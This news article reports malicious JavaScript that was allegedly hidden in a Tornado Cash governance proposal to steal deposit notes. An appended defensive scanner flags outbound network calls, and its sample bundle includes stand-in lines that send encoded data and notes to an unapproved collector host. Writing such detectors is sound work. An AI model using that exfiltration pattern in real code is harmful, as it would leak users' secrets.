Tornado Cash, a name that stood for privacy, security, and controversy in the crypto community, has just been hit by a concerning revelation. A developer, known in the community as Butterfly Effects, allegedly smuggled malicious JavaScript into a governance proposal, catching everyone off guard. Since the beginning of the year, it appears that anyone who used IPFS gateways to interact with Tornado Cash might have had their deposit notes compromised and sent straight to a server under the control of the supposed developer.
For the uninitiated, Tornado Cash serves as a non-custodial privacy solution, allowing users to make transactions on the Ethereum network without leaving a trace. This recent exploit revolves around a piece of code that was meant to remain unnoticed. It was designed to snatch deposit notes and funnel them to a private server, all under the guise of a benign governance proposal.
But here’s where things get interesting: the exploit targeted transactions made through IPFS deployments of Tornado Cash. In other words, if you interacted with Tornado Cash using local interfaces, breathe a sigh of relief—you’re in the clear, thanks to the transparency and auditability of direct contract interactions.
The exploit itself is a crafty piece of work. I am actually impressed by the work. In essence, it encodes the private deposit note so that it looks like ordinary transaction call data, then quietly uses the window.fetch function to transmit that sensitive information to the attacker’s server.
The community discovered the exploit code on IPFS gateways such as Cloudflare’s and traced it to a suspicious Ethereum address. However, there’s a silver lining in the form of recovery steps that users and the community can take to safeguard their assets and the integrity of Tornado Cash. One important measure is to switch to the recommended IPFS contenthash deployment, which could shield users from further harm; that deployment was validated through prior governance proposals.
As usual, the community is rallying together, with entities like ZeroTwoDAO and Gas404 developers advocating for a proactive stance against such exploits. Their call to action is for TORN holders to exercise their voting rights and veto proposals that might harbor malicious code.
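As an added example (not code from the original post or from the Tornado Cash project), here is the kind of static check a TORN holder or reviewer could run over a proposal’s frontend bundle before voting: it lists every outbound network call site and flags destinations that are not on an assumed governance-approved origin allowlist. The allowlisted origins and the sample bundle are constructed placeholders.

```javascript
// Static scan of a frontend JS bundle for outbound network calls.
// Finds fetch(), navigator.sendBeacon() and XMLHttpRequest.open() call sites,
// extracts the destination argument, and classifies it against an allowlist.

// Assumed allowlist: origins a governance proposal is expected to talk to.
// These are placeholders, not real Tornado Cash endpoints.
const APPROVED_ORIGINS = new Set([
  "https://rpc.example-node.org",
  "https://api.example-relayer.org",
]);

// Group 2: first argument of fetch()/sendBeacon(); group 3: URL argument of
// xhr.open("METHOD", url). Arguments are captured up to the next ',' or ')'.
const CALL_RE =
  /\b(fetch|sendBeacon)\s*\(\s*([^,)]*)|\.open\s*\(\s*["'`]\w+["'`]\s*,\s*([^,)]*)/g;

// Classify one raw destination argument as approved, unapproved, relative
// (same-origin path) or dynamic (built at runtime, so it needs manual review).
function classifyTarget(rawArg, approved) {
  const arg = rawArg.trim();
  const literal = arg.match(/^["'`]([^"'`]*)["'`]$/);
  if (!literal) return { kind: "dynamic", target: arg };
  let origin;
  try {
    origin = new URL(literal[1]).origin;
  } catch {
    return { kind: "relative", target: literal[1] };
  }
  return { kind: approved.has(origin) ? "approved" : "unapproved", target: origin };
}

// Returns one finding per call site: { api, kind, target, line }.
function scanBundle(source, approved = APPROVED_ORIGINS) {
  const findings = [];
  for (const m of source.matchAll(CALL_RE)) {
    const api = m[1] || "XMLHttpRequest.open";
    const rawArg = m[1] ? m[2] : m[3];
    const line = source.slice(0, m.index).split("\n").length;
    findings.push({ api, line, ...classifyTarget(rawArg, approved) });
  }
  return findings;
}

// Constructed sample bundle: one approved RPC call, one beacon to an unknown
// collector host, one approved relayer XHR, and one runtime-built URL.
const SAMPLE_BUNDLE = `
const rpc = fetch("https://rpc.example-node.org", { method: "POST", body: payload });
navigator.sendBeacon("https://collector.invalid/submit", encoded);
const xhr = new XMLHttpRequest(); xhr.open("POST", "https://api.example-relayer.org/v1/relay");
fetch(endpoint + "/notes", { body: note });
`;

console.table(scanBundle(SAMPLE_BUNDLE)); // unapproved and dynamic rows need review
```

Minified production bundles will hide most literal URLs behind variables, so treat every "dynamic" finding as a prompt for manual review rather than a pass.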
Source: https://www.cryptopolitan.com/malicious-code-tornado-cash-governance/